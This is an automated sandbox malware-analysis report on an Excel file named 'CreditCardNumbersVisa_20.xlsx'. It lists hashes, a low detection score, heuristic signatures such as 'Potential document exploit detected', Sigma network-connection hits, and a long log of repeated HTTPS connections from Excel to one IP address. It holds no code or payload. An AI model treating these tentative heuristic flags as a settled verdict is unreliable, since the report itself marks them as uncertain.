Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CreditCardNumbersVisa_20.xlsx

Overview

General Information

Sample name:CreditCardNumbersVisa_20.xlsx
Analysis ID:1545072
MD5:4a78e0e0db778f79f5a76a16c447c6c4
SHA1:5916f25319eaf7e13bd7a311abc6af39cb456819
SHA256:d1d5930da65d1436f99f7e518892c2ebc1d8d1cf2976fa0863522df7cc33dcfd
Infos:

Detection

Score:24
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

AI detected landing page (webpage, office document or email)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 3996 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 3200 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.45, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 52774
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 52774, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 3996, Protocol: tcp, SourceIp: 13.107.246.45, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:52774 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52513 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52512 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52516 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52518 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52519 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52517 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52520 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52521 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52523 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52525 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52522 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52524 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52528 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52527 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52529 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52530 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52531 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52533 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52532 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52535 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52536 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52534 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52538 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52539 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52540 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52541 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52542 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52543 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52545 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52544 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52546 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52547 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52549 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52550 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52551 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52552 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52553 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52555 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52554 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52556 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52558 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52559 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52560 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52561 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52562 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52557 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52564 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52565 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52563 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52566 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52567 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52569 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52568 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52570 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52571 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52572 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52573 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52574 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52575 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52576 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52577 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52578 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52579 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52580 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52581 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52582 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52583 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52585 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52584 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52586 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52587 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52588 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52589 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52590 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52591 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52592 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52593 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52595 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52594 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52596 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52597 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52598 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52599 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52600 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52601 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52602 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52603 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52604 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52605 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52606 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52607 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52608 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52609 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52610 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52611 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52612 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52613 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52614 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52615 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52616 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52617 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52618 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52619 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52620 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52621 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52622 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52623 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52624 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52625 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52626 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52627 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52628 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52629 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52630 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52631 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52632 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52633 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52634 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52635 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52636 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52637 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52638 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52639 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52640 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52641 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52642 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52643 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52644 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52645 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52647 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52646 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52648 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52649 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52650 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52651 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52652 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52653 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52654 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52655 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52656 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52657 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52659 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52658 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52660 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52661 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52662 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52663 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52664 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52665 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52666 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52667 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52668 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52669 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52671 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52670 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52672 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52674 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52673 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52675 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52676 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52677 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52679 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52678 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52680 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52681 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52682 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52684 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52683 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52685 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52686 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52687 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52689 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52688 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52690 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52691 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52692 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52694 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52693 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52695 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52696 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52697 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52698 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52699 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52700 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52701 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52702 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52703 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52704 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52706 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52705 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52707 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52708 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52709 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52711 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52712 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52713 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52714 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52715 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52716 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52717 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52718 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52719 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52720 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52721 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52723 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52724 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52725 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52726 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52728 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52729 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52730 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52731 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52732 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52733 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52727 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52734 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52735 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52736 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52737 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52738 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52739 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52740 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52741 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52742 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52744 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52745 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52746 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52747 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52748 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52743 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52749 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52750 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52752 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52753 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52751 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52754 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52755 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52756 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52757 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52758 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52759 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52760 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52761 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52762 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52763 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52764 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52765 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52766 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52767 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52768 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52769 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52770 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52771 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52772 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52773 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52774 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52775 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:49722 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52507 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52504 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52509 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52505 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52510 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52506 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52511 -> 13.107.246.45:443
Source: global trafficTCP traffic: 192.168.2.5:52508 -> 13.107.246.45:443
